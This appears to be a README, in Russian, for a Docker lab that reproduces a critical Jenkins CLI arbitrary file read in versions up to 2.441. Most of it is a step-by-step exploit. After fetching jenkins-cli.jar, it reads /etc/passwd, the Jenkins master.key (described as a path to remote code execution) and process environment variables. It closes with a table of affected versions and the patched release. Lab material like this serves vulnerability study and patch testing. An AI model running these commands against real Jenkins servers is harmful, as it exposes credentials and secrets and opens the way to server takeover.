
# 1. Запустите лабораторию
docker-compose up -d
# 2. Подождите ~30 секунд, затем скачайте CLI-инструмент
curl -O http://localhost:8080/jnlpJars/jenkins-cli.jar
# 3. Эксплойт — чтение /etc/passwd (полный файл)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/etc/passwd
# 4. Читаем master.key (цепочка до RCE)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/var/jenkins_home/secrets/master.key
# 5. Чтение переменных окружения
java -jar jenkins-cli.jar -s http://localhost:8080 -http help @/proc/self/environ
Полный технический анализ (на вьетнамском) — в REPORT.md.
| Параметр | Значение |
|---|---|
| CVSS | 9.8 (критический) |
| Затронутые версии | Jenkins <= 2.441, LTS <= 2.426.2 |
| Версия лаборатории | jenkins/jenkins:2.426.2-lts |
| Корневая причина | args4j expandAtFiles включён в серверном CLI |
| Исправление | Обновите до Jenkins >= 2.442 / LTS >= 2.426.3 |
docker-compose down -v --remove-orphans